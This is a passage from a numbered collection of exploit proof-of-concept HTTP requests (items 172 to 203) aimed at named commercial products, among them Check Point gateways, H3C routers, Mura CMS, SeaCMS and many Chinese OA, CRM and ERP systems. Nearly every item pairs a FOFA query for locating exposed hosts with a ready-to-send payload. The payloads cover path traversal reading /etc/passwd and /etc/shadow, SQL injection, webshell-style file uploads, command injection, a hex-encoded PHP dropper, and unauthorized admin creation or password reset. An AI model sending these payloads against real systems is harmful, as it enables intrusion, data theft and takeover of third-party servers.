Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--


GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. LANWON (蓝网科技) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (aliyundrive-webdav) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. Redsea (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
